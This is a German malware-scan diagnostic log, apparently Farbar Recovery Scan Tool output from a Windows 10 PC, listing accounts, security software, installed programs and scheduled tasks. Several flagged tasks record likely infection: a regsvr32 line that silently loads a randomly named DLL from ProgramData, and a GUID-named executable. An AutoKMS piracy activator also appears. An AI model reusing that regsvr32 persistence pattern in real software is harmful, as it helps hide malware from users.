durchgeführt von Dino (22-05-2017 18:36:44)
Gestartet von C:\Users\Dino\Desktop
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version:  - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version:  - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version:  - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version:  - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version:  - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Malwarebytes Version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.3 (x86 de)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.3.6347 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version:  - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version:  - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version:  - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe 
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe 
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe  <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
